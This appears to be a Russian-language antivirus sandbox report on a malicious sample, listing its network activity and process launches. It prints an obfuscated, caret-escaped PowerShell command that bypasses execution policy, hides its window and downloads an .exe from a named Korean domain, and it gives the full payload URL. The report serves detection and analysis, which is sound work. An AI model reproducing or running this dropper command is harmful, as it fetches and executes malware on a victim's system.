Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://dongkook-ind.co.kr/data/21/xyeyv/9sk6.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "P^Owe^rS^h^ell.EX^E^ -^exE^c^u^t^I^OnpoLiC^Y ^b^YP^as^S ^-^noPROFI^LE^ -^wInD^owsTylE h^iDDen^ (n^Ew^-^OB^J^ec^t Sy^S^tE^m^.nEt.w^EBcl^i^e^n^t).D^oWn^LoADF^i^le(^'http://dongko...
Сетевая активность
Подключается к
- 'do####ok-ind.co.kr':80
TCP
Запросы HTTP GET
- http://do####ok-ind.co.kr/data/21/XyEYv/9sk6.exe
UDP
- DNS ASK do####ok-ind.co.kr
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "P^Owe^rS^h^ell.EX^E^ -^exE^c^u^t^I^OnpoLiC^Y ^b^YP^as^S ^-^noPROFI^LE^ -^wInD^owsTylE h^iDDen^ (n^Ew^-^OB^J^ec^t Sy^S^tE^m^.nEt.w^EBcl^i^e^n^t).D^oWn^LoADF^i^le(^'http://dongko...' (со скрытым окном)
